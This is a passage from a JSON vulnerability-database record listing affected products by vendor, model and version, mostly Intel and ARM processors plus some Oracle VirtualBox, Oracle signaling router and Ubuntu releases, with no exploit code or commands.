        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5650"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v3"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8550u"
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v3"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "9"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4550u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670r"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4624l_v2"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2370m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450s"
      },
      {
        "_id": null,
        "model": "xeon e5 1660",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340te"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3687u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770k"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5675"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3265rk"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2516"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2130"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v3"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3758"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3480"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2365m"
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1545m_v5"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380m"
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3840qm"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7560u"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2530"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qe"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4220y"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2557m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210y"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3470"
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980x"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712hq"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5609"
      },
      {
        "_id": null,
        "model": "xeon e3 1275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2328m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5649"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3750"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v2"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1900"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702hq"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y30"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130f"
      },
      {
        "_id": null,
        "model": "xeon e3 1275l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114t"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3205rk"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640lm"
      },
      {
        "_id": null,
        "model": "xeon e5 2470",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3320m"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2508"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5607"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4617"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330e"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850hq"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2338"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330te"
      },
      {
        "_id": null,
        "model": "xeon e5 2650l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710mq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3460"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3475s"
      },
      {
        "_id": null,
        "model": "xeon e3 1270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v4"
      },
      {
        "_id": null,
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.1.32"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2340ue"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5010u"
      },
      {
        "_id": null,
        "model": "xeon e3 1105c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3570"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5005u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500t"
      },
      {
        "_id": null,
        "model": "xeon e3 1258l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6360u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560"
      },
      {
        "_id": null,
        "model": "xeon bronze 3104",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "72"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1515m_v5"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4205"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2720qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3227u"
      },
      {
        "_id": null,
        "model": "xeon e5 2643",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735e"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585_v5"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "930"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6200u"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2820"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2350m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2300"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330"
      },
      {
        "_id": null,
        "model": "xeon e5 2430l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3115c"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920xm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4810mq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658a_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5503"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870hq"
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2550"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3845"
      },
      {
        "_id": null,
        "model": "xeon e3 1220l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735f"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5530"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4657l_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v3"
      },
      {
        "_id": null,
        "model": "xeon e3 1226 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3635qm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5667"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2375m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2677m"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6320"
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "655k"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570t"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3160"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680"
      },
      {
        "_id": null,
        "model": "xeon e5 2448l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1231 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v4"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7555"
      },
      {
        "_id": null,
        "model": "xeon e3 1260l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4771"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "760"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "57"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3826"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4500u"
      },
      {
        "_id": null,
        "model": "xeon e3 1286l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2890_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675r"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650l"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6144"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2377m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860qm"
      },
      {
        "_id": null,
        "model": "xeon e5 1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2623 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5640"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5520"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6152"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770k"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "970"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4308u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4258u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v2"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.10"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v4"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176f"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5687"
      },
      {
        "_id": null,
        "model": "xeon e3 1501m v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6267u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3317u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2815"
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2430m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850eq"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y32"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3795"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7567u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7560"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4807"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6287u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460s"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w"
      },
      {
        "_id": null,
        "model": "xeon e5 2630",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590s"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3530"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10a"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520um"
